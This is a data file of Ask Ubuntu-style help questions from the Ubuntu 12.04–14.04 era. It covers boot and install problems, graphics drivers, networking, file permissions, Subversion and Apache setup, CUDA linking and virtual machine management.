510104	liveusb and livecd not letting me install 14.04	once the purple screen with the keyboard and person appear , i press enter and get taken to a language screen . once there , i select english , press f6 , and then set nomodeset so that it has an ''x ' next to it . either moving ahead with install unbuntu or try ubuntu i get taken to a purple screen with 4 or 5 loading dots which animate for a second , and then drop me off at a black and unresponsive screen . gigabyte z97 gaming 7 evga nvidia geforce gtx 780ti 16gb ( 8x2 ) corsair vengeance pro intel i5-4670k nothing is overclocked . any ideas what could be going on ? i 've plugged one of the monitors into the motherboard -- still nothing .
510105	how to measure voice frequency range in hz ?	i want to measure the voice frequency in hz . is there any open source or tool available in ubuntu ?
510107	how can i set a task to wake my computer up , after shutdown ?	i`m using ubuntu 12.04 and i need to power on my computer by creating a task just like wake up my phone by setting alarm in nokia phones , can i do this in linux systems ?
510110	compatible os on amd apu dual core-e1-2100 with 2gb ram	i would like to use ubuntu on my lenovo laptop with amd apu dual core-e1-2100 and 2gb ram , let me know the compatible ubuntu os .
510113	what are the files needs to be edit to add a user ? and what to be write ?	i am trying to write a c program to add a new user to my ubuntu 14.04 . i edited 1 ) /etc/passwd sachin : x:65535:1 : sachin : /home/sachin : /bin/bash 2 ) /etc/shadow sachin : $ 6 $ vwbwgroa $ t4kxlwif81swtia1/a.frlrxaoaflgtmo73hgvczp/m6s8oizz4iqk.vybkblxzj2hggxjxlj.m2hghgo.a650:16294 : : : : : : 3 ) .profile stty istrip path=/bin : /usr/bin : /usr/local/bin : /usr/share/bin : . export path after this when i run - ls -l /home/ drwxr-xr-x 43 mrcr mrcr 4096 aug 12 10:27 mrcr d-w -- -- -- t 2 sachin daemon 4096 aug 12 11:11 sachin where `` sachin '' is created by my rpogram , `` mrcr '' is created normally . i changed the permissions like a normal user home drwxr-xr-x 2 sachin daemon 4096 aug 12 11:11 sachin i copied all files from `` mrcr '' home directory to `` sachin '' home directory ( .bashrc , desktop ..etc ) now in login screen `` sachin '' is there to login . but even if i enter correct password i ca n't login into it . it will load again the same login screen . given below is my entire code , # include < stdio.h > # include < string.h > # include < stdlib.h > # include < sys/types.h > # include < pwd.h > # include < signal.h > # include < unistd.h > main ( int argc , char **argv ) { struct passwd *userlist ; int count , usernumber , len1 ; file *tmp , *stmp , *mailer , *profile ; char *commentfield , *username , *userdir , *home ; char *mailcomment , *mailmail , reply ; commentfield = ( char * ) malloc ( 1024*sizeof ( char ) ) ; username = ( char * ) malloc ( 8*sizeof ( char ) ) ; userdir = ( char * ) malloc ( 256*sizeof ( char ) ) ; home = ( char * ) malloc ( 256*sizeof ( char ) ) ; mailcomment = ( char * ) malloc ( 1024*sizeof ( char ) ) ; mailmail = ( char * ) malloc ( 512*sizeof ( char ) ) ; if ( argc ! =4 ) { printf ( `` usage : % s [ dirname- no slashes ] [ logname ] [ comment - in quotes ] \n '' , argv [ 0 ] ) ; exit ( 1 ) ; } if ( ( strlen ( argv [ 2 ] ) < 5 ) || ( strlen ( argv [ 2 ] ) > 8 ) ) { printf ( `` pls enter logname between 5-8 \n '' ) ; exit ( 1 ) ; } signal ( sighup , sig_ign ) ; signal ( sigint , sig_ign ) ; setpwent ( ) ; count = 0 ; while ( ( userlist = getpwent ( ) ) ! = null ) { if ( count < userlist- > pw_uid ) { count = userlist- > pw_uid ; usernumber = count + 1 ; } } printf ( `` usernumber : % d\n '' , usernumber ) ; endpwent ( ) ; sprintf ( commentfield , '' % s '' , argv [ 3 ] ) ; sprintf ( username , `` % s '' , argv [ 2 ] ) ; sprintf ( userdir , `` % s '' , argv [ 1 ] ) ; sprintf ( home , `` / % s/ % s '' , argv [ 1 ] , argv [ 2 ] ) ; printf ( `` \n check this out here : \n '' ) ; printf ( `` -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - '' ) ; printf ( `` \n username : \t % s '' , username ) ; printf ( `` \n home directory : \t % s '' , home ) ; printf ( `` \n comment : \t % s '' , commentfield ) ; printf ( `` \n______________________________________________\n\n '' ) ; printf ( `` all of this ok ? n/y : `` ) ; scanf ( `` % c '' , & reply ) ; if ( reply ! = 'y ' ) { printf ( `` \n exiting ... .u entered not y '' ) ; exit ( 1 ) ; } tmp = fopen ( `` /etc/passwd '' , `` a '' ) ; if ( tmp == null ) { printf ( `` \npermission denied\n '' ) ; exit ( 1 ) ; } fprintf ( tmp , `` % s : x : % d:1 : % s : % s : /bin/bash\n '' , username , usernumber , commentfield , home ) ; fclose ( tmp ) ; stmp = fopen ( `` /etc/shadow '' , `` a '' ) ; if ( stmp == null ) { printf ( `` \npermission denied\n '' ) ; exit ( 1 ) ; } fprintf ( stmp , `` % s : *lk* : : : : : : : \n '' , username ) ; fclose ( stmp ) ; mkdir ( home , 0755 ) ; chdir ( home ) ; profile = fopen ( `` .profile '' , `` a '' ) ; fprintf ( profile , `` stty istrip\n '' ) ; fprintf ( profile , `` path=/bin : /usr/bin : /usr/local/bin : /usr/share/bin : .\n '' ) ; fprintf ( profile , `` export path\n '' ) ; fprintf ( profile , `` \n\n '' ) ; fclose ( profile ) ; chown ( home , usernumber , 1 ) ; chown ( `` .profile '' , usernumber , 1 ) ; chmod ( `` .profile '' , 0644 ) ; printf ( `` \n\nall done ! ! ! ! ! ! ! \n now set the password : `` ) ; execl ( `` /usr/bin/passwd '' , `` passwd '' , username , null ) ; printf ( `` \n\n success password is set ... ..bye ! ! ! \n\n '' ) ; } questions : what are the files needs to be edit ? how can i run the program without to be a root ? what changes i needs to put in my code ?
510120	on kubuntu how can i keep wifi connected when my laptop is closed ?	i only use this laptop at home , and i would like it to stay connected when the lid closed so my dropbox and crashplan will continue to work during this time . how can i keep it from disconnecting when i close the lid ?
510121	network not working when installing ubuntu 14.04.1 using encrypted lvm	i have installed ubuntu 14.04 using guide - use entire disk with encrypted lvm . all the services are working but i am not able to ping the gateway , nor i am able to ping the vm from outside . if i install the os without encryption same details and settings are working perfectly fine .
510122	dual boot windows 8 and ubuntu 14.04	i have installed ubuntu 14.04 on my sony vaio laptop along with windows8 , now ubuntu has been successfully installed and for the first time it showed me both ubuntu and windows8 login options to get in , but i selected windows 8 after restarting the system it 's not showing the ubuntu login , it 's directly taking me to windows , so guys please guide me how to fix this issue , it 's like when ever i power-on the system it has to show me both the operating systems to select .
510131	can not install or remove software	i am using ubuntu 14.04 and i recently when i download the new software from ubuntu it gives messages saying new software can not be install because there is problem with currently installed software . i search on net and found apt-get install -f , but this also could not solve my problem . and i want to remove some other installed software such as postgresql , but it also failed to uninstall . now i am on a problem because i need to currently install some software - i have tried apt-get install -f on root but also it failed to solve my problem .
510134	how to increase vm hdd and ram sizes ?	i installed ubuntu 14.04 vm on virtualbox . i used this vm for several weeks . i need to increase its ram and hdd size . is there a way to do so ?
510136	what to choose when both updates : ( 1 ) new hardware support available and ( 2 ) new ubuntu 14.04.1 lts are available ?	a month ago , the update manager was showing a message new hardware support available -- download . today update manager again shows two messages : new ubuntu 14.04.1 lts is available -- -upgrade new hardware support available -- download i am wondering which options to choose . should i download the hardware stack first then upgrade to 14.04 ? or only one ? or none at all ?
510138	how can i get nvidia-settings to load at start up ?	i know there are other questions on this topic , but i ca n't seem to find any answers regarding my specific problem . i am setting my monitor to 144hz in the nvidia settings . i know that those settings do not stick after boot unless you run nvidia-settings -- load-config-only after first creating the configuration file . i have created the configuration file .nvidia-settings-rc but it 's not working . if i run nvidia-settings -- load-config-only or add it to start up it does nothing . i think that maybe i am not saving the configuration file where nvidia-settings wants me to . i 've just been saving it in the default location that nvidia settings gives me when i go to save it , which is home/user/ . should i be saving it somewhere else ? i have also tried nvidia-settings -- config=/home/alex/.nvidia-settings-rc -- load-config-only but it also seems to do nothing .
510143	i want to modify linux kernel and make iso image of kernel	i 'm studying about virtualization . i want to modify a kernel and make a iso image of ubuntu . then , i want to load that iso file to qemu . is it possible and how to do it ?
510147	ca n't execute executable in ubuntu 14.04 with a+x	when i try to run a program ( eclipse ) from a specific folder i get permission denied . here is the log : > ./eclipse bash : ./eclipse : permission denied > ls -l eclipse -rwxr-xr-x 1 torstein torstein 73015 sep 11 2013 eclipse my username is torstein and the folder is on a ext4 formatted partition and home is on another ext4 partition . if i copy the folder to `` home '' the program runs .
510151	lan not working	i am about to use a wimax modem and obtain internet connection through the ethernet cables but when the isp installer ( who came to our house not that familiar in linux ) is about to configure , he ca n't do it . so i just tried these things out : 1 ) input : ethtool eth0 output : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : not reported advertised pause frame use : no advertised auto-negotiation : yes speed : unknown ! duplex : unknown ! ( 255 ) port : twisted pair phyad : 0 transceiver : internal auto-negotiation : on mdi-x : unknown can not get wake-on-lan settings : operation not permitted current message level : 0x0000003f ( 63 ) drv probe link timer ifdown ifup link detected : no 2 ) input : ethtool ethx output : can not get device settings : no such device can not get wake-on-lan settings : no such device can not get message level : no such device can not get link status : no such device no data available 3 ) input : sudo rfkill list all output : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : yes 1 : ideapad_bluetooth : bluetooth soft blocked : yes hard blocked : yes 2 : phy0 : wireless lan soft blocked : no hard blocked : no 3 : brcmwl-0 : wireless lan soft blocked : no hard blocked : yes 4 ) input : ifconfig -a ouptut : eth0 link encap : ethernet hwaddr b8:88 : e3:88:62:3b up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1283 errors:0 dropped:0 overruns:0 frame:0 tx packets:1283 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:183079 ( 183.0 kb ) tx bytes:183079 ( 183.0 kb ) ppp0 link encap : point-to-point protocol inet addr:10.13.147.136 p-t-p:10.64.64.64 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1500 metric:1 rx packets:6478 errors:0 dropped:0 overruns:0 frame:0 tx packets:7867 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:2817719 ( 2.8 mb ) tx bytes:967126 ( 967.1 kb ) wlan0 link encap : ethernet hwaddr 08:3e:8e:16:60:2b broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 how can i enable my lan now and obtain internet connection ? i am using lenovog470 . it apparently got went and since then i ca n't use wifi so i 'm trying use wired cables as of now . is this already a hardware issue to be fixed by technical means ?
510152	ubuntu subversion repository not getting checked out	i have some problems with checking out my repository . first , i ensured that everything is up to date : ubuntu @ ip-172-31-10-247 : ~ $ sudo apt-get update perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lc_ctype = `` utf-8 '' , lang = `` en_us.utf-8 '' are supported and installed on your system . then i deleted a locale line from /etc/ssh/sshd_config and rebooted ubuntu . ubuntu @ ip-172-31-10-247 : /etc $ cd ssh ubuntu @ ip-172-31-10-247 : /etc/ssh $ ls moduli ssh_host_dsa_key ssh_host_ecdsa_key ssh_host_rsa_key ssh_import_id ssh_config ssh_host_dsa_key.pub ssh_host_ecdsa_key.pub ssh_host_rsa_key.pub sshd_config ubuntu @ ip-172-31-10-247 : /etc/ssh $ sudo nano sshd_config ubuntu @ ip-172-31-10-247 : /etc/ssh $ sudo reboot broadcast message from ubuntu @ ip-172-31-10-247 ( /dev/pts/0 ) at 6:03 ... the system is going down for reboot now ! connection to 54.179.129.215 closed by remote host . connection to 54.179.129.215 closed . studio-film1 : serverkey metricfilm $ ssh -i keykey.pem ubuntu @ 54.179.129.215 welcome to ubuntu 14.04 lts ( gnu/linux 3.13.0-29-generic x86_64 ) ubuntu @ ip-172-31-10-247 : /etc/ssh $ sudo apt-get install subversion apache2 libapache2-svn * starting web server apache2 * setting up libapache2-mod-svn ( 1.8.8-1ubuntu3 ) ... apache2_invoke : enable module dav_svn * restarting web server apache2 [ ok ] apache2_invoke : enable module authz_svn * restarting web server apache2 [ ok ] setting up ssl-cert ( 1.0.33 ) ... setting up subversion ( 1.8.8-1ubuntu3 ) ... setting up libapache2-svn ( 1.8.8-1ubuntu3 ) ... processing triggers for ureadahead ( 0.100.0-16 ) ... processing triggers for ufw ( 0.34~rc-0ubuntu2 ) ... ubuntu @ ip-172-31-10-247 : / $ ls bin boot dev etc home initrd.img lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz ubuntu @ ip-172-31-10-247 : / $ sudo mkdir -p /var/svn/repos/ ubuntu @ ip-172-31-10-247 : / $ cd /var/svn/repos/ ubuntu @ ip-172-31-10-247 : /var/svn/repos $ sudo svnadmin create -- fs-type fsfs myrepo ubuntu @ ip-172-31-10-247 : /var/svn/repos $ mkdir -p /tmp/myproject/trunk /tmp/myproject/tags /tmp/myproject/branches ubuntu @ ip-172-31-10-247 : /var/svn/repos $ sudo svn import /tmp/myproject file : ///var/svn/repos/myrepo -m `` initial import '' adding /tmp/myproject/branches adding /tmp/myproject/tags adding /tmp/myproject/trunk committed revision 1. ubuntu @ ip-172-31-10-247 : /var/svn/repos $ cd /etc/apache2/sites-available ubuntu @ ip-172-31-10-247 : /etc/apache2/sites-available $ sudo touch subversion.conf then i created new subversion.conf like this : namevirtualhost *:80 < virtualhost *:80 > < location /svn > errordocument 404 default dav svn svnparentpath /var/svn/repos svnlistparentpath off require valid-user authtype basic authname `` subversion access '' authuserfile /var/svn/.htpasswd authzsvnaccessfile /var/svn/authz < /location > < /virtualhost > and enabled it for apache . ubuntu @ ip-172-31-10-247 : /etc/apache2/sites-available $ a2enmod dav_svn ubuntu @ ip-172-31-10-247 : /etc/apache2/sites-available $ sudo a2ensite subversion.conf enabling site subversion . to activate the new configuration , you need to run : service apache2 reload ubuntu @ ip-172-31-10-247 : /etc/apache2/sites-available $ service apache2 reload * reloading web server apache2 * ubuntu @ ip-172-31-10-247 : /etc/apache2/sites-available $ /etc/init.d/apache2 restart * restarting web server apache2 [ fail ] ubuntu @ ip-172-31-10-247 : / $ ls bin boot dev etc home initrd.img lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz ubuntu @ ip-172-31-10-247 : / $ htpasswd -c /var/svn/.htpasswd user the program 'htpasswd ' is currently not installed . you can install it by typing : sudo apt-get install apache2-utils ubuntu @ ip-172-31-10-247 : / $ sudo apt-get install apache2-utils ubuntu @ ip-172-31-10-247 : / $ sudo htpasswd -c /var/svn/.htpasswd user new password : re-type new password : adding password for user user ubuntu @ ip-172-31-10-247 : / $ sudo touch /var/svn/authz ubuntu @ ip-172-31-10-247 : / $ sudo nano /var/svn/authz i then created a new authz : [ myrepo : / ] user = rw trying to just checkout myrepo like this http : //ec2-54-255-179-196.ap-southeast-1.compute.amazonaws.com//svn/myrepo it 's not showing up . i have enabled ports via security group 22 for ssh 80 fot http 3690 for subversion can you show me where i am going wrong or what i have to do more to check out my repository ?
510154	ubuntu 13.04 to 13.10 upgrade has made drive inaccesable	i recently upgraded to 13.10 from 13.04 , and encountered kernel panic on restarting the system . i have some uncommited code on my drive , so i planed to use live usb to take it out but unfortunately i get this error when i try to open the drive . here it the output for dmesg | tail root @ ubuntu : /media # dmesg | tail [ 1675.866734 ] 72 03 11 04 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 1675.866751 ] 1c a5 98 02 [ 1675.866759 ] sd 0:0:0:0 : [ sda ] [ 1675.866764 ] add . sense : unrecovered read error - auto reallocate failed [ 1675.866768 ] sd 0:0:0:0 : [ sda ] cdb : [ 1675.866771 ] read ( 10 ) : 28 00 1c a5 98 00 00 00 08 00 [ 1675.866786 ] end_request : i/o error , dev sda , sector 480614402 [ 1675.866801 ] ata1 : eh complete [ 1675.866830 ] jbd2 : io error reading journal superblock [ 1675.866835 ] ext4-fs ( sda6 ) : error loading journal and here is the output for fdisk -l root @ ubuntu : ~ # fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x48000000 device boot start end blocks id system /dev/sda1 63 353429 176683+ de dell utility /dev/sda2 * 354304 559103 102400 7 hpfs/ntfs/exfat /dev/sda3 559104 329183231 164312064 7 hpfs/ntfs/exfat /dev/sda4 329185278 625141759 147978241 5 extended /dev/sda5 329185280 341938175 6376448 82 linux swap / solaris /dev/sda6 341940224 625141759 141600768 83 linux disk /dev/sdb : 15.5 gb , 15512174592 bytes 32 heads , 63 sectors/track , 15028 cylinders , total 30297216 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x5bfe1883 device boot start end blocks id system /dev/sdb1 63 30296447 15148192+ b w95 fat32 disk /dev/sdc : 4012 mb , 4012900352 bytes 124 heads , 62 sectors/track , 1019 cylinders , total 7837696 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0008de2e device boot start end blocks id system /dev/sdc1 * 62 7834071 3917005 c w95 fat32 ( lba ) root @ ubuntu : ~ # is there anyway i can possibly get my uncommited code out of the drive ?
510156	convert sony vaio f series to ubuntu ? or dual boot ?	i have a vaio , model number vpcf234fd , and i 'd really love to dual boot it . but i 've seen that many people have trouble dual-booting their vaios . does anyone have experience with an f series vaio ? secondly , if it 's not possible to dual boot , could i just replace windows altogether ? would that work better ? once windows 7 support ends i 'm not really interested in spending money to upgrade . so , has anyone tried replacing windows on a vaio ?
510158	run program through terminal with custom name [ solved ]	i want to run a program , for example gedit from terminal . how can i run gedit through terminal by just typing ge on terminal ?
510159	ubuntu 14.04 max brightness is n't the max brightness	i am experiencing an issue with the brightness on my laptop ( sony vaio vpcf21z1e ) . this issue has been occurring since ubuntu 12.04 . essentially when my laptop boots into ubuntu the brightness is set to the max . normally when press the fn+f6 combination ( the combination you would normally press to make the brightness go higher ) but your brightness is already at the max , it should just stay at the max but what actually happens is my brightness goes down even though the slider bar does n't show any difference . i know the above action does n't make any scene but when i lower my screen brightness at night and then want to max it at day , it does n't go at the max . and that 's my issue . it 's like the max brightness set in ubuntu is n't actually the max brightness . if anyone could help me with this issue , that would be great !
510162	unable to completely purge fglrx	i 've got 14.04 and installed the proprietary amd catalyst 14.6 using the generate distribution specific driver package option described in the installer notes . i 'd now like to change to the mesa-vdpau-drivers but can not completely purge fglrx from my system . what i 've tried so far is what i found in several howtos that basically comes down to running these commands : sudo apt-get remove -- purge fglrx fglrx-amdcccle fglrx-dev sudo apt-get remove -- purge xserver-xorg-video-ati xserver-xorg-video-radeon sudo apt-get install xserver-xorg-video-ati sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri xserver-xorg-core sudo mv /etc/x11/xorg.conf /etc/x11/xorg.conf.backup sudo rm -rf /etc/ati however , in my dmesg output i still get these lines showing up : [ 58.779902 ] fglrx : module license 'proprietary . ( c ) 2002 - ati technologies , starnberg , germany ' taints kernel . [ 58.779916 ] disabling lock debugging due to kernel taint [ 58.798511 ] fglrx : module verification failed : signature and/or required key missing - tainting kernel [ 58.822853 ] < 6 > [ fglrx ] maximum main memory to use for locked dma buffers : 1506 mbytes . [ 58.823307 ] < 6 > [ fglrx ] vendor : 1002 device : 9804 count : 1 [ 58.824514 ] < 6 > [ fglrx ] ioport : bar 1 , base 0xf000 , size : 0x100 [ 58.825520 ] < 6 > [ fglrx ] kernel pat support is enabled [ 58.825577 ] < 6 > [ fglrx ] module loaded - fglrx 14.10.2 [ may 5 2014 ] with 1 minors here 's the full dmesg output in pastebin . would be grateful for any help ...
510166	immediate `` maximum execution time '' in php5 on ubuntu 14.04 without parsing the script	i 'm running a webserver on my pandaboard with ubuntu 14.04 . at the moment lighttpd is installed with php5 ( release : dfsg-1ubuntu4.3 ) . after a fresh start of lighttpd everything works fine . all php scrips are exectued correctly and i get the output in my browser . but after a few connections ( and disconnections ) i always get errors in my error.log like : '' ( mod_fastcgi.c.2673 ) fastcgi-stderr : php fatal error : maximum execution time of 30 seconds exceeded in '' normally the solution would be to increase the parse time of php . the problem is that the scripts have n't been executed for 30 seconds . i 'll immediatly get this error ( less that one second after execution ) . i can increase time value to 60 or 300 seconds . but nothing changed . there 's still no parse time and i 'll immediatly get this error . at first i thought it 's a problem of lighttpd . but also with apache2 i 'll get this error . so this should be an error somewhere in php5 . i 'll also tried to purge the complete installation and reinstalled everything with new config files . but the error is still the same . the only solution to get rid of this problem for a few minutes is to restart the lighttpd daemon . but this helps only for a short time . after a few minutes the problem reoccures . anyone any ideas what could be the rease for this error ?
510167	unable to write in folder in which my user has write access	before i say anything , i know how permission for groups and users works . my setup is : a. my user is monkey and is in the group www-data groups monkey monkey : monkey adm cdrom sudo dip www-data plugdev lpadmin sambashare b. the root folder of apache is /home/monkey/var/www and has the permissions 0775 with owner www-data and group www-data ls -la /home/monkey/var/www total 8 drwxrwxr-x 2 www-data www-data 4096 aug 12 10:37 . drwxr-xr-x 3 root root 4096 aug 12 10:37 .. c. but i 'm unable to write in /home/monkey/var/www/ monkey @ ubuntu : ~ $ cp robots.txt var/www/robots.txt cp : can not create regular file 창var/www/robots.txt창 : permission denied the robots.txt file was created under monkey user . what am i missing ?
510173	to extend the partition allotted for ubuntu 14.04 lts	i am currently running windows 8.1 and ubuntu 14.04lts , initially i allotted only 10gb partition to it , as it is not sufficient how can i extend my ubuntu partition without affecting windows . file : ///home/anupam/pictures/screenshot % 20from % 202014-08-12 % 2014:06:48.png
510175	help by installing mail server with virtual host	04 and i find a lot of articles about installing mail server on ubuntu but it is not working . can you help me with some tutorial ? i want to install and configure my own mail server with virtual users . i installed dovecot and postfix . at last i want install roundcube and configure it for my virtual users .
510176	result of make command is /usr/bin/ld : can not find -lcudart	i am newbie to ubuntu and using ubuntu 14.04 64-bit . i want to make a project that uses cuda and opencv i got the following error when running cmake . & & make linking cxx executable ground_estimation /usr/bin/ld : can not find -lcudart collect2 : error : ld returned 1 exit status make [ 2 ] : *** [ ground_estimation ] error 1 make [ 1 ] : *** [ cmakefiles/ground_estimation.dir/all ] error 2 make : *** [ all ] error 2 this is the output of ld -lcudart -- verbose attempt to open /usr/x86_64-linux-gnu/lib64/libcudart.so failed attempt to open /usr/x86_64-linux-gnu/lib64/libcudart.a failed attempt to open //usr/local/lib/x86_64-linux-gnu/libcudart.so failed attempt to open //usr/local/lib/x86_64-linux-gnu/libcudart.a failed attempt to open //usr/local/lib64/libcudart.so failed attempt to open //usr/local/lib64/libcudart.a failed attempt to open //lib/x86_64-linux-gnu/libcudart.so failed attempt to open //lib/x86_64-linux-gnu/libcudart.a failed attempt to open //lib64/libcudart.so failed attempt to open //lib64/libcudart.a failed attempt to open //usr/lib/x86_64-linux-gnu/libcudart.so failed attempt to open //usr/lib/x86_64-linux-gnu/libcudart.a failed attempt to open //usr/lib64/libcudart.so failed attempt to open //usr/lib64/libcudart.a failed attempt to open //usr/local/lib/libcudart.so failed attempt to open //usr/local/lib/libcudart.a failed attempt to open //lib/libcudart.so failed attempt to open //lib/libcudart.a failed attempt to open //usr/lib/libcudart.so failed attempt to open //usr/lib/libcudart.a failed libcudart exist in /usr/local/cuda/lib64 and i also added to library path : echo $ ld_library_path /usr/lib/nvidia-current : /usr/local/cuda/lib64 : /usr/local/cuda/lib : this is the output of ls /usr/local/cuda/lib64 : libcublas_device.a libcufftw.so.6.0.37 libnppi.so.6.0 libcublas.so libcuinj64.so libnppi.so.6.0.37 libcublas.so.6.0 libcuinj64.so.6.0 libnpps.so libcublas.so.6.0.37 libcuinj64.so.6.0.37 libnpps.so.6.0 libcudadevrt.a libcurand.so libnpps.so.6.0.37 libcudart.so libcurand.so.6.0 libnvblas.so libcudart.so.6.0 libcurand.so.6.0.37 libnvblas.so.6.0 libcudart.so.6.0.37 libcusparse.so libnvblas.so.6.0.37 libcudart_static.a libcusparse.so.6.0 libnvtoolsext.so libcufft.so libcusparse.so.6.0.37 libnvtoolsext.so.1 libcufft.so.6.0 libnppc.so libnvtoolsext.so.1.0.0 libcufft.so.6.0.37 libnppc.so.6.0 libopencl.so libcufftw.so libnppc.so.6.0.37 libopencl.so.1 libcufftw.so.6.0 libnppi.so what should i do that ld search in /usr/local/cuda/lib64 path to find libcudart ?
510179	java_home problem , i ca n't find java 's path	i try to change environment but it did n't work . i think i wrote wrong the path for java . i write this /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java . how can i find the true java path ?
510180	how to remove all traces of curl installed using libcurl package ( .tar.gz )	i have installed curl package in ubuntu 12.04 . i tried the sudo apt-get install php5-curl method but it did not work . i downloaded the curl-7.37.1.tar.gz package from http : //curl.haxx.se/download.html and extracted it and followed how do i install a .tar.gz ( or .tar.bz2 ) file ? to install a .tar.gz file . i am not able to configure it to work with apache . how can i remove it so that i can install curl using apt-get ?
510182	how to automatically clone a vm ?	i run a windows xp vm on an ubuntu host machine version 14.04 . i cloned 5 times the main vm . i am running a special software on the first vm . the software will damage the vm one day or an other . so that is why i automatically start one of the remaining 4 vm . as the remaining vms will be harmed by time , i wonder how could i generate a bash script on the host machine that will allow me to automatically clone a safe vm ?
510188	how to rollback software updates ?	i am having some difficulty with recent software updates and this is not the first time . by pressing the shift key on startup i can ( usually ) get the grub menu but when i choose `` advanced options '' it only shows 2 options : 3.13.0-24 and 3.13.0-24 ( recovery mode ) whereas i understood it should show previous kernel versions . i already stick to only lts versions of ubuntu . what is a safe way to accept updates in future please ? how can i install only the most tested updates ? i would like to be able to easily roll them back if they cause problems . in other words i am looking for the linux equivalent of making a windows system restore point . maybe i should never accept updates but wait until the next lts version and then upgrade ?
510189	remove directory to grandpa directory and delete the parent directory	sometimes , we note that we have unuseful nested containers ( directrories ) . for example mkdir -p ~/grandpa/pa ; and pa directory is the only file existed on grandpa . hence , all files of pa should be removed to grandpa , then pa will be deleted . my question is there is a built-in command line do such a mission : i.e : orphan ~/grandpa/pa/* ; or fatherless ~/grandpa/pa/* ;
510199	how to send at commands to a phone via bluetooth ?	is there software to send at commands to a phone via bluetooth from ubuntu ?
510200	want to detect android x86 in ubuntu grub menu	i was using ubuntu and windows 8.1 in my lenovo g560 laptop . later i installed android x86 4.4.2 ( kitkat ) but the problem is grub is not detecting android x86 in grub menu . i had also done the sudo grub-update in the terminal of ubuntu , and still only ubuntu and windows are only listed . moreover i also tried boot-repair , same result came.if there is some advance settings in boot-repair than i do n't know .
510201	which server version ( 64-bit ) of ubuntu will be suitable ( for gazebo and ros simulation ) ?	i am using dell precision t7500 chassis ( intel ( r ) xeon ( r ) e5606 2.13ghz , 8m cache , 4.8 gt/s qpi , turbo , ht , 4c , nvidia tesla c2050 graphic card,1gb nvidia quadro 600 , dual monitor,1dp & 1dvi ) as server . if any one has work experience or idea in this plz let me know , which server version of ubuntu will be best suitable .
510202	can not remove nexus 5 network from network list	when i click on the network manager indicator i have an odd entry in there called nexus 5 network clicking on it does nothing and it does not show up in the list of networks in edit connections the university i 'm studying at suggests that this is causing some of the connection troubles that i 'm having . can anyone suggest why this is appearing and how i can have it safely removed ? i 'm running ubuntu 14.04 on a dell xps 13 laptop .
510204	installing node with apt-get or downloading the linux binaries ( .tar.gz )	what is the difference between installing node.js with 'sudo apt-get install nodejs ' or downloading the linux binaries ( .tar.gz ) and following these instructions ? is the outcome the same ?
510211	ubuntu 14.04 unity got slow during the last couple of updates	i 've been using ubuntu since 12.04 and have not really experienced any issues until a couple of weeks ago when my pc got really slow and all software as well . switching workspaces is more of a lagfest than a smooth animation . i do n't think its a hardware issue since the specs are pretty high-end except for the graphics card . amd fx-8320 8 core nvidia gtx630 16gb ddr3 ram ( 1600 ) running ; ubuntu 14.04 amd64 nvidia proprietary drivers 331.38 ( have also tested noeveau driver but no cigar ) even typing is slow , i can sometimes type 3 words before they appear in this text-box on askubuntu . i tried switching to gnome but that made things even worse , so i switched back to unity . i have no clue as to where one would start looking for issues , so i turn to you guys for tips . edit so it seems that switching to a lightweight de fixes some of the issues but seriously , should n't my specs be able to handle unity or gnome ? i have another equal workstation but running windows 7 ultimate instead , and i have never experienced anything that even resembles lag on that pc - even with 4 android emulators running simultaneously . i 'll switch to a lighter de if needed but i 'm having a real hard time thinking that the developers expect the public to have much better pc 's than my specs when running ubuntu - i 'm thinking my specs is a bit overkill even cut in half ( except for the graphics ) . plus i like having a modern look and feel , which none of the lighter de provides ( everything looks like it was made in the 1980 's ) . edit i changed the iommu bios setting and reinstalled ubuntu without any proprietary drivers and now everything seems to be working at last .
510212	flowview plugin for cacti on ubuntu 12.04	i have installed the cacti0.8.8 in my ubuntu 12.04 box and right now i 'm trying to integrate the real time bandwidth monitoring for my network ( individual ip based ) .i have went through different forums they suggested like to install the flowview plugin.i guess it will take delay in updating the real time graph . any one suggest me the plugin which i can able to integrate to my cacti box and possible of installation steps will be helpful .
